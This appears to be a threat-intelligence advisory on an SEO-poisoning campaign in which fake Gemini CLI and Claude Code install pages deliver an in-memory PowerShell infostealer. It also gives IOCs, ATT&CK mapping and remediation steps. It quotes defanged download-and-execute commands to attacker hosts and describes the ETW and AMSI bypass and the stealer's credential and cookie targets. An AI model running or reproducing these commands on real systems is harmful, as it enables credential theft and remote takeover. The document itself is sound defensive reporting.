SEO Poisoning Campaign Impersonates Gemini CLI and Claude Code to Deliver In-Memory PowerShell Infostealer (EclecticIQ)
SEO Poisoning Campaign Impersonates Gemini CLI and Claude (TL-2026-0546), also tracked as Gemini CLI Impersonation Campaign, is a high-severity campaign, first published 2026-05-21. It has no confirmed attribution, affects Google Gemini CLI (impersonated), maps to 33 MITRE ATT&CK techniques (T1005, T1012, T1027), and is covered by 9 detection rules and 69 indicators of compromise.
Key facts for TL-2026-0546
- Threat ID
- TL-2026-0546
- Also known as
- Gemini CLI Impersonation Campaign, Claude Code Impersonation Campaign, AI Tooling SEO Poisoning Campaign (EclecticIQ)
- Severity
- HIGH
- Status
- ACTIVE
- Category
- CAMPAIGN
- First published
- 2026-05-21
- Last reviewed
- 2026-05-21
- Attribution confidence
- NONE
- Motivation
- FINANCIAL
- Target sectors
- technology, software-development, financial, government, professional-services, healthcare, education, msp-managed-services
- Target regions
- North America, United States, United Kingdom, Europe
- Detection rules
- 9
- Indicators of compromise
- 69
Malware and tooling in SEO Poisoning Campaign Impersonates Gemini CLI and Claude
Malware and tooling: Unnamed PowerShell Infostealer (EclecticIQ tracking)
EclecticIQ analysts identified an ongoing financially motivated eCrime campaign that uses SEO poisoning to surface typosquatted domains impersonating Gemini CLI, Claude Code, Node.js, Chocolatey, KeePassXC, and Monero installation pages above legitimate Google search results. Victims paste a one-line PowerShell command from the fake page that pulls a second-stage infostealer directly into memory via irm | iex, disables ETW and AMSI, then harvests OAuth tokens, browser credentials, SaaS session cookies (Slack, Teams, Discord, Mattermost), VPN configurations, SSH keys, cloud-storage contents, and developer secrets before exfiltrating to events.msft23[.]com and events.ms709[.]com. The implant also supports operator-issued PowerShell RCE, enabling hands-on-keyboard pivots into enterprise networks.
How SEO Poisoning Campaign Impersonates Gemini CLI and Claude works
EclecticIQ Threat Research published an analysis on 2026-05-21 of an ongoing infostealer campaign first observed in early March 2026 that targets enterprise developer workstations by impersonating AI coding assistants and developer tooling. The campaign was originally surfaced by independent researcher @g0njxa, who flagged a Windows malware deployment impersonating Google's Gemini CLI. EclecticIQ analysts subsequently pivoted on passive DNS and infrastructure overlaps to map a wider cluster of more than 30 typosquatted domains operated by what they assess with medium-to-high confidence is a single financially motivated threat actor.
Initial Access: The infection chain begins with a Google search by a developer looking for the official Gemini CLI or Claude Code installation page. The operator uses search-engine optimization poisoning (MITRE T1608.006) to promote a fake domain such as geminicli[.]co[.]com or claudecode[.]co[.]com above the legitimate vendor result. The fake page is a visually faithful clone of the genuine installation guide and prompts the visitor to paste a single PowerShell one-liner into a terminal. This 'paste-and-execute' (ClickFix-adjacent) lure is tuned to the workflow developers and IT administrators already use when installing CLI tooling from package-manager pages.
First-stage downloader: The PowerShell embedded on the fake page performs two simultaneous actions. (1) It instantiates a Shell.Application COM object and calls ShellExecute with window style 0 to spawn a hidden PowerShell window, which runs 'irm events[.]msft23[.]com | iex' (Invoke-RestMethod piped to Invoke-Expression) to fetch and execute the second-stage payload entirely in memory. (2) In parallel the same script invokes 'npm install -g @google/gemini-cli', which installs the real Gemini CLI from the official Google npm registry so the victim sees a successful, legitimate install in their terminal. The benign install is the visible decoy while the in-memory stealer runs to completion.
Second-stage infostealer: Once executed in memory, the second stage immediately patches PSEtwLogProvider.m_enabled to disable PowerShell ETW telemetry (T1562.006) and performs an in-process AMSI bypass (T1562.001), eliminating the two primary Windows host-based telemetry pipelines for script content. The payload is heavily obfuscated with roughly 6,800 lines of junk-branch code and includes a 'qemu-ga' string check as an anti-sandbox gate (T1497.001). The script then loads three embedded C# helper types at runtime via Add-Type: CredHelper (P/Invokes advapi32!CredEnumerate against Windows Credential Manager), User32 (calls EnumDisplaySettings to fingerprint display and detect VMs), and Rstrtmgr (uses the Restart Manager API in rstrtmgr.dll to enumerate processes without calling the monitored Get-Process cmdlet).
Collection scope: The stealer iterates browser profiles for Chrome, Edge, Brave, and Firefox, extracting login credentials, session cookies, autofill, and form history. It targets enterprise collaboration platforms (Slack Local State key and Network cookies, Microsoft Teams EBWebView DPAPI-protected cookies, Discord Local Storage LevelDB plus Local State, Mattermost cookies, Telegram Desktop tdata, Zoom DPAPI-protected win_osencrypt_key, LiveChat, Notion, Zoho Mail Desktop, Evernote). It dumps remote-access secrets (WinSCP saved sessions from HKCU:\SOFTWARE\Martin Prikryl\WinSCP 2\, PuTTY sessions from HKCU:\Software\SimonTatham\PuTTY\Sessions, OpenVPN configs and DPAPI-protected GUI login data), cryptocurrency wallets (Brave Wallet, Spectre), Steam installation data, and enumerates cloud-synced directories (Proton Drive, iCloud Drive, Google Drive, MEGA, OneDrive). It also recursively lists .txt and .docx files under Desktop, Documents, and Downloads, captures the desktop wallpaper via TranscodedWallpaper, and pulls OS version, installed software, network adapter configuration, and running process inventory via WMI and the Restart Manager API.
Command-and-Control: The implant beacons over HTTPS to events.msft23[.]com (Gemini lure) and events.ms709[.]com (Claude / Node.js / Chocolatey lures) on three endpoints: /take (initial configuration / staging), /process (the main beacon that uploads exfiltrated data and receives an RSA-encrypted task list in the same response), and /validate (task-execution status report). The implant decrypts the task list, matches each record's target ID against the local MachineGuid-derived victim ID, and runs the operator-supplied URL via 'powershell.exe -command IEX(Invoke-WebRequest -UseBasicParsing <url>)' through Shell.Application.ShellExecute. A secondary path uses named pipes to spawn a child PowerShell process and stream its output back. There is no on-disk persistence in the analyzed sample; the malware operates fully in memory.
Infrastructure: EclecticIQ pivoted from claude-code[.]co[.]com (resolved to 109.107.170[.]111 at Netherlands-based bulletproof hosting provider MIRhosting) and uncovered a cluster of 30+ typosquatted domains targeting AI coding tools, Node.js, Chocolatey, KeePassXC, and Monero, registered primarily between late March and early April 2026. The cluster favors .co.com, .us.com, .us.org, and .co.uk TLDs, with C2 hostnames following an 'events.<microsoft-evoking-root>.com' or 'metrics.<root>.com' template (events.msft23.com, events.ms709.com, metrics.msft17.com). One Node.js lure (nodejs-setup[.]co[.]com) chains two spoofed domains by instructing victims to run 'irm https://community.chocolatey[.]net/install.ps1 | iex', impersonating both Node.js and Chocolatey in a single workflow-faithful sequence. The threat actor reuses a single tooling template across lures, rotating only the brand and the C2 hostname.
Attribution and motivation: EclecticIQ assesses with high confidence that the campaign is operated by a single financially motivated eCrime actor. The targeting choice (developer-focused tooling) and the implant's session-cookie and OAuth-token focus align with the broader access-broker market, where session material from Slack, Teams, GitHub, and corporate VPN tooling commands premium prices because it bypasses MFA. The campaign is geographically tilted toward United States and United Kingdom users based on TLD selection.
Impact for defenders: A single compromised developer workstation yields OAuth tokens for GitHub / GitLab / cloud SaaS, CI/CD credentials, corporate VPN configurations including DPAPI-protected secrets, session cookies for collaboration platforms that bypass MFA, and SSH keys for production infrastructure. Combined with the implant's RCE capability, this provides a direct path to hands-on-keyboard intrusions, lateral movement into the wider enterprise, and supply-chain compromise via the developer's source-control and pipeline access.
MITRE ATT&CK techniques used in TL-2026-0546
Collection
T1005 Data from Local System; T1074.001 Data Staged: Local Data Staging; T1113 Screen Capture
Discovery
T1012 Query Registry; T1057 Process Discovery; T1082 System Information Discovery; T1083 File and Directory Discovery; T1518.001 Software Discovery: Security Software Discovery
Defense Evasion
T1027 Obfuscated Files or Information; T1036.005 Match Legitimate Resource Name or Location; T1140 Deobfuscate/Decode Files or Information; T1218 System Binary Proxy Execution; T1497.001 Virtualization/Sandbox Evasion: System Checks; T1620 Reflective Code Loading
Exfiltration
T1041 Exfiltration Over C2 Channel
Execution
T1059.001 Command and Scripting Interpreter: PowerShell; T1204.001 User Execution: Malicious Link; T1204.002 User Execution: Malicious File; T1559.001 Inter-Process Communication: Component Object Model
Command and Control
T1071.001 Application Layer Protocol: Web Protocols; T1105 Ingress Tool Transfer; T1573.002 Encrypted Channel: Asymmetric Cryptography
Initial Access
Credential Access
T1528 Steal Application Access Token; T1539 Steal Web Session Cookie; T1552.001 Unsecured Credentials: Credentials In Files; T1552.002 Unsecured Credentials: Credentials in Registry; T1555.003 Credentials from Password Stores: Credentials from Web Browsers; T1555.004 Credentials from Password Stores: Windows Credential Manager
Resource Development
T1583.001 Acquire Infrastructure: Domains; T1583.004 Acquire Infrastructure: Server; T1608.006 Stage Capabilities: SEO Poisoning
defense-impairment
Affected products and versions in SEO Poisoning Campaign Impersonates Gemini CLI and Claude
- Google — Gemini CLI (impersonated)
Vulnerable versions: all (typosquat installation page) - Anthropic — Claude Code (impersonated)
Vulnerable versions: all (typosquat installation page) - OpenJS Foundation — Node.js (impersonated)
Vulnerable versions: all (typosquat installation page) - Chocolatey Software — Chocolatey (impersonated)
Vulnerable versions: all (typosquat installation page) - KeePassXC Team — KeePassXC (impersonated)
Vulnerable versions: all (typosquat installation page) - Microsoft — Windows endpoints (PowerShell 5.1+ targeted)
Vulnerable versions: Windows 10; Windows 11; Windows Server 2019+
Remediation for SEO Poisoning Campaign Impersonates Gemini CLI and Claude
Immediate actions
- Block known attacker-controlled domains (events.msft23.com, events.ms709.com, metrics.msft17.com, geminicli.co.com, claudecode.co.com, claude-setup.com, gemini-setup.com, claude-code.co.com, nodejs-setup.co.com, community.chocolatey.net, chocolatey.co.com, chocolatey-setup.co.com, chocolatey-download.co.com, keepassxc.us.com, keepassxc.us.org, get-monero.co.uk, getmonero.us.com, api.bio9438.com, openclow.co.com, olive3451.com, geninicli.co.com) at proxy, DNS, and firewall layers
- Block outbound traffic to 109.107.170.111 (MIRhosting) and any other MIRhosting ranges where business need is not established
- Hunt for the 'irm | iex' download cradle in PowerShell ScriptBlock and command-line telemetry across the estate over the last 90 days
- Sweep endpoints for the 29 SHA-256 hashes published in the EclecticIQ IOC list
- Force OAuth token, browser session, and Slack/Teams/Discord session invalidation for any developer endpoint that matches IOC or behavior detections; rotate WinSCP, PuTTY, and OpenVPN credentials
Workarounds
- If CLM cannot be enforced, restrict powershell.exe execution to signed scripts only via WDAC ConstrainedLanguage policy
- Block .co.com, .us.com, and .us.org TLDs at the secure web gateway where business need is not established
- Disable PowerShell v2 engine across the estate to remove downgrade evasion paths
Longer-term hardening
- Enforce PowerShell Constrained Language Mode (CLM) on developer endpoints via WDAC or AppLocker to block Add-Type, reflection, and P/Invoke-based credential theft
- Deploy AppLocker or WDAC rules that prevent powershell.exe from executing scripts downloaded from the internet (enforce Mark-of-the-Web)
- Enable and centrally collect PowerShell ScriptBlock and Module logging with tamper-resistant forwarding to detect ETW-disable attempts
- Roll out FIDO2 / phishing-resistant MFA for developer-tier accounts and enforce short-lived OAuth tokens with conditional access to limit replay of stolen session cookies
- Configure browser policies to disable clipboard write access from untrusted sites to mitigate ClickFix-style paste-and-execute lures
- Deliver developer-specific awareness training on typosquatted installer domains and the 'paste this command' lure pattern
Timeline of SEO Poisoning Campaign Impersonates Gemini CLI and Claude
- EclecticIQ analysts first identify the ongoing infostealer campaign targeting Gemini CLI and Claude Code users in early March 2026.
- Threat actor registers two additional domains for Claude Code impersonation: claudecode[.]co[.]com and claude-setup[.]com, mirroring the Gemini naming pattern (co[.]com suffix and -setup[.]com convention).
- Late March through early April 2026: threat actor registers 30+ additional typosquatted domains impersonating Node.js, Chocolatey, KeePassXC, and Monero, primarily on .co.com, .us.com, .us.org, and .co.uk TLDs.
- EclecticIQ pivots on passive DNS from claude-code[.]co[.]com hosted at 109.107.170[.]111 (MIRhosting, Netherlands) to enumerate the full cluster of 30+ domains.
- Independent researcher @g0njxa publicly flags the Gemini CLI malware deployment on X/Twitter, enabling EclecticIQ to begin infrastructure pivoting.
- Threadlinqs Intelligence ingests the EclecticIQ report and opens TL-2026-0546 for analyst-grade tracking.
- EclecticIQ Threat Research Team publishes full technical analysis including IOCs, MITRE mapping, detection guidance, and 29 SHA-256 sample hashes.
- As of 2026-05-29, this SEO-poisoning/ClickFix infostealer campaign impersonating Gemini CLI and Claude Code remains active: EclecticIQ called it ongoing in its 2026-05-21 report (8 days prior), with 30+ resilient typosquat domains and no takedown, seizure, or arrest. No CVEs to patch; Recorded Future assesses ClickFix will stay a primary 2026 access vector, so the technique and actor persist.
Sources cited for SEO Poisoning Campaign Impersonates Gemini CLI and Claude
- EclecticIQ: SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer
- @g0njxa initial discovery tweet on Gemini CLI malware deployment
- Gemini CLI official site
- Anthropic Claude Code product page
- pinvoke.net: advapi32 CredEnumerate / CredWrite
- Krebs on Security: Bulletproof Host Stark Industries Evades EU Sanctions (MIRhosting context)
- MITRE ATT&CK T1608.006 — Stage Capabilities: SEO Poisoning
- MITRE ATT&CK T1059.001 — Command and Scripting Interpreter: PowerShell
- MITRE ATT&CK T1562.001 — Impair Defenses: Disable or Modify Tools (AMSI bypass)
Threats related to SEO Poisoning Campaign Impersonates Gemini CLI and Claude
Detection coverage for TL-2026-0546
As of 2026-05-21, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0546 across Splunk SPL, Microsoft KQL and Sigma, covering 69 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.